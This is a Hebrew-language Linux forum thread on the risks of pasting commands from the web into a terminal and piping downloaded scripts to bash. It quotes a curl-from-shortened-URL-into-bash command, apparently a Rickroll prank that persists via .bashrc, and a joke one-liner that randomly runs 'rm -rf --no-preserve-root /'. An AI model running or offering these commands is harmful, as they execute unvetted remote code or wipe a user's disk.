ווטסאפ - לינוקס, BSD, קוד פתוח ותוכנה חופשית בעברית. Whatsup - Linux, BSD, open source and free software in Hebrew

 
 
  כניסת חברים · רישום · שכחתי סיסמה  
tux the penguin
תגובה לנושא
צפיה בנושא הבא Printable version התחבר כדי לבדוק הודעות פרטיות צפיה בנושא הקודם
elcucoלא בפורום כעת ת.הצטרפות: 14/10/2003 · הודעות: 6061 ·
 

הודעה פורסם: 08/05/2017 - 14:14
נושא ההודעה: לא להדביק פקודות מהרשת אל הטרמינל

באתרים רבים יש פקודות רבות. הרבה פעמים רואים משהו ... אבל יש Java Script שבעת לחיצה משנים את התוכן של ה-HTML כך שבפועל מועתק קוד שונה מזה שאורים על המסך.

עוד דוגמא, אפשר לראות כאן, נא לא להדביק את זה אל המסוף שלכם:
קוד:

curl -L http://bit.ly/10hA8iC | bash
 
 צפיה בפרופיל המשתמש שלח הודעה פרטית  
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
אורח · ·
 

הודעה פורסם: 08/05/2017 - 14:28
נושא ההודעה: Re: לא להדביק פקודות מהרשת אל הטרמינל

elcuco :
באתרים רבים יש פקודות רבות. הרבה פעמים רואים משהו ... אבל יש Java Script שבעת לחיצה משנים את התוכן של ה-HTML כך שבפועל מועתק קוד שונה מזה שאורים על המסך.

עוד דוגמא, אפשר לראות כאן, נא לא להדביק את זה אל המסוף שלכם:
קוד:

curl -L http://bit.ly/10hA8iC | bash


כן, צריך להבין מה אתה עושה ומה אתה קורא.
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
טוב לדעתאורח · ·
 

הודעה פורסם: 08/05/2017 - 14:29
נושא ההודעה:

היא עוד דוגמה
https://security.stackexchange.com/questions/113627/what-is-the-risk-of-copy-and-pasting-linux-commands-from-a-website-how-can-some

אבל עם noscript מופעל זה לא יכול לקרות. Smile
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
אורח · ·
 

הודעה פורסם: 08/05/2017 - 18:10
נושא ההודעה:

לא הבנתי מה הבעיה.
צריך לדעת מה אתה מריץ ולא סתם להוריד סקריפט ולהריץ.
המון המון תוכנות משתמשות בשיטה הזו.
לדוגמה -
שף - https://docs.chef.io/install_omnibus.html
נוד - https://nodejs.org/en/download/package-manager/#debian-and-ubuntu-based-linux-distributions
בלאקארץ (שם בכלל יש בדיקת חתימה על הסקריפט) - https://blackarch.org/downloads.html#install-repo


הבעיה היא בלינק המקוצר ואיך הגעת אליו. ולא בהתקנה דרך curl | sh
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
אורח · ·
 

הודעה פורסם: 09/05/2017 - 09:59
נושא ההודעה:

מבולבלים? גם אני... מכל השרשור הזה לא ברור ממה בדיוק צריך להזהר ואיך להמנע מסקריפטים כאלו. אשמח לשורה תחתונה פרקטית
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
mksoftלא בפורום כעתSite Admin ת.הצטרפות: 17/03/2002 · הודעות: 10122 · מיקום: כדור הארץ
 

הודעה פורסם: 09/05/2017 - 10:03
נושא ההודעה:

בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים.

אם נראה לי בסדר, מריץ אותו.

_________________
הבלוג שלי
 
 צפיה בפרופיל המשתמש שלח הודעה פרטית שלח דוא\ ביקור באתר המפרסם  
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
elcucoלא בפורום כעת ת.הצטרפות: 14/10/2003 · הודעות: 6061 ·
 

הודעה פורסם: 10/05/2017 - 09:08
נושא ההודעה:

Anonymous :
מבולבלים? גם אני... מכל השרשור הזה לא ברור ממה בדיוק צריך להזהר ואיך להמנע מסקריפטים כאלו. אשמח לשורה תחתונה פרקטית


תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד.
 
 צפיה בפרופיל המשתמש שלח הודעה פרטית  
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
אורח · ·
 

הודעה פורסם: 10/05/2017 - 09:24
נושא ההודעה:

ציטוט:
תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד.

ציטוט:
נא לא להדביק את זה אל המסוף שלכם:

אם לא הייתי מספיק מבולבל אז עכשיו.. העלאת הנושא על ידך חשובה ובעלת ערך אבל לא כולם מנוסים ומבינים מספיק בכדי לזהות פקודה בעיתית. האם מדובר על פקודות שיש בהן כתובת http://...? איך יודעים אם יש בפקודה JS? ואיך מבצעים את זה:
ציטוט:
בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים.

תודה
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
elcucoלא בפורום כעת ת.הצטרפות: 14/10/2003 · הודעות: 6061 ·
 

הודעה פורסם: 10/05/2017 - 10:01
נושא ההודעה:

Anonymous :
ציטוט:
תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד.

ציטוט:
נא לא להדביק את זה אל המסוף שלכם:

אם לא הייתי מספיק מבולבל אז עכשיו.. העלאת הנושא על ידך חשובה ובעלת ערך אבל לא כולם מנוסים ומבינים מספיק בכדי לזהות פקודה בעיתית. האם מדובר על פקודות שיש בהן כתובת http://...? איך יודעים אם יש בפקודה JS? ואיך מבצעים את זה:
ציטוט:
בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים.

תודה


זאת בדיחה. תודה שהרסת לי. יא קקה. בכל זאת תריץ - יהיה צחוקים.

ברצינות :
הבעייה היא לא JavaScript. אלא שאתה מאפשר למישהו חיצוני להריץ קוד bash על המחשב שלך. ואין לך שליטה עליו. איך מובטח לך שאין באמצע פקודה שמוחקת לך את הדיסק? או במקביל מתקינה לך משהו חדש? או שאין באג בגרסה הספציפית שאתה מוריד?

מאיר אמר שהוא מוריד את הקובץ, בודק אותו ואז מריץ ידנית.
 
 צפיה בפרופיל המשתמש שלח הודעה פרטית  
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
אורח · ·
 

הודעה פורסם: 10/05/2017 - 12:09
נושא ההודעה:

אז הבעיה שאני לוקח אתכם יותר מדי ברצינות...! Wink
הרצתי ומופיע רקדן ברזולוציה נמוכה - מקווה שבפעם הבאה אדע להמנע מאיזה רקדן מסוכן
תודה
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
elcucoלא בפורום כעת ת.הצטרפות: 14/10/2003 · הודעות: 6061 ·
 

הודעה פורסם: 10/05/2017 - 14:44
נושא ההודעה:

Anonymous :
אז הבעיה שאני לוקח אתכם יותר מדי ברצינות...! Wink
הרצתי ומופיע רקדן ברזולוציה נמוכה - מקווה שבפעם הבאה אדע להמנע מאיזה רקדן מסוכן
תודה


תפעיל רמקולים יא קקה. הרסת חצי מהבדיחה.

אבל עדיין ההמלצה תקפה - אל תדביק דברים באופן אקראי מהרשת, גם מאתרים מוכרים. הם תמיד html של הדף שלך - ולכן יכולות לשנות את ה-dom.

זה לא קרה לך, אבל גם עדיין לא דרסו אותי במעבר חצייה, אז אין טעם להסתכל מהצדדים או לחכות לאור ירוק.
 
 צפיה בפרופיל המשתמש שלח הודעה פרטית  
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
אורח · ·
 

הודעה פורסם: 10/05/2017 - 15:31
נושא ההודעה:

מסתבר שגם להרוס בדיחות צריך לדעת... הרמקול מופעל רק שמשום מה אין לי רמקול כשמריצים מהטרמינל. את העיקר נראה שהבנתי ומקווה להזהר בפעם הבאה
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
to_elcuco‏אורח · ·
 

הודעה פורסם: 10/05/2017 - 15:45
נושא ההודעה:

יאללה נעלה שלב
קוד:
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf —no-preserve-root / || echo *Click*
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
אורח · ·
 

הודעה פורסם: 10/05/2017 - 15:45
נושא ההודעה:

חברים, קצת דרך ארץ לא תזיק!

לשואל המבולבל, ואחרים שאולי יגיעו לשרשור הזה:

יש פה ניסיון להזהיר בפני שתי שיטות עבודה מסוכנות שעלולות להוביל לביצוע פקודות מזיקות על המחשב שלכם:

1. הדבקת טקסט ישירות מדף אינטרנט למסוף.
אתר זדוני יכול להציג טקסט אחד, אבל להעתיק טקסט שונה לגמרי, ואם בסופו יש סימן n\, הפקודה תתבצע לפני שתספיקו לשים לב שזו בכלל לא הפקודה שהעתקתם.

שתי דרכים למנוע את המצב הן:
1.1 להדביק קודם את השורה בעורך טקסט, לבחון אותה, ואם בטוחים שזה מה שרוצים להריץ, להדביק במסוף.
1.2 להקליד את הפקודה בעצמכם. זו הדרך הטובה ביותר לוודא שאתם גם מבינים מה אתם עושים, ולא סתם מעתיקים בצורה עיוורת בתקווה שזה יפתור את הבעיה שלה חיפשתם פתרון.


2. הרצה של סקריפטים שהורדו מהרשת בלי לבדוק מה באמת ירד, ואפילו מאיזה קישור.
בדוגמה עם curl מבקשים להוריד מ-URL מקוצר (שמחביא את הכתובת האמתית) וישר להריץ את מה שירד ע"י הזרמתו (דרך צינור | ) ל-shell.


כדי להימנע מצרות כאלה, יש לפעול במשנה זהירות:
2.1 להוריד רק מאתרים שאתם בוטחים בהם, ואם קיבלתם מסיבה כלשהי URL מקוצר, לבדוק טוב טוב לאן הוא מוביל באמת.
2.2 אם יש לכם את הידע, עדיף לעבור על הסקריפט שהורדתם. אם אין, תצטרכו לסמוך על מי ששם את הסקריפט, וגם שלא פרצו לו לאתר ולא השחילו משהו.

ולבסוף, רוב החברים באתר עם הידע, מבינים די מהר שצירפת קישור עם סריפט ריק רול.
שגם מוסיף עצמו ל-bashrc. כדי לרוץ אוטומטית.

ומי שאין לא מספיק ידע, לא יסתכן לבדוק.

אז ממש לא צריך לצעוק "קקה" על מי ששאל שאלות על זה או הסתכן ובדק שהסקריפט עובד!!!

אם כי אני מודה שלא ציפיתי שריק רולינג יגיע גם ל-bash...

--לב
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
צפריראורח · ·
 

הודעה פורסם: 11/05/2017 - 19:21
נושא ההודעה:

מה שכן, אני מעריך את אלה שיודעים לכתוב פקודות שיודעות לא לגרום נזק, אבל בצורה אלגנטית. לדוגמה:
https://lists.debian.org/debian-devel-announce/2017/04/msg00000.html
עם שיפור הניסוח בתגובה:
https://lists.debian.org/debian-devel/2017/04/msg00000.html
 
   
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
הצגת הודעות מלפני:     
מעבר אל:  
כל הזמנים הם GMT + 2 שעות
תגובה לנושא
צפיה בנושא הבא Printable version התחבר כדי לבדוק הודעות פרטיות צפיה בנושא הקודם
PNphpBB2 © 2003-2004 

תוכן הדיון

  1. elcuco
  2. אורח
  3. אורח [טוב לדעת]
  4. אורח
  5. אורח
  6. mksoft
  7. elcuco
  8. אורח
  9. elcuco
  10. אורח
  11. elcuco
  12. אורח
  13. אורח [to_elcuco‏]
  14. אורח
  15. אורח [צפריר]

Google Ads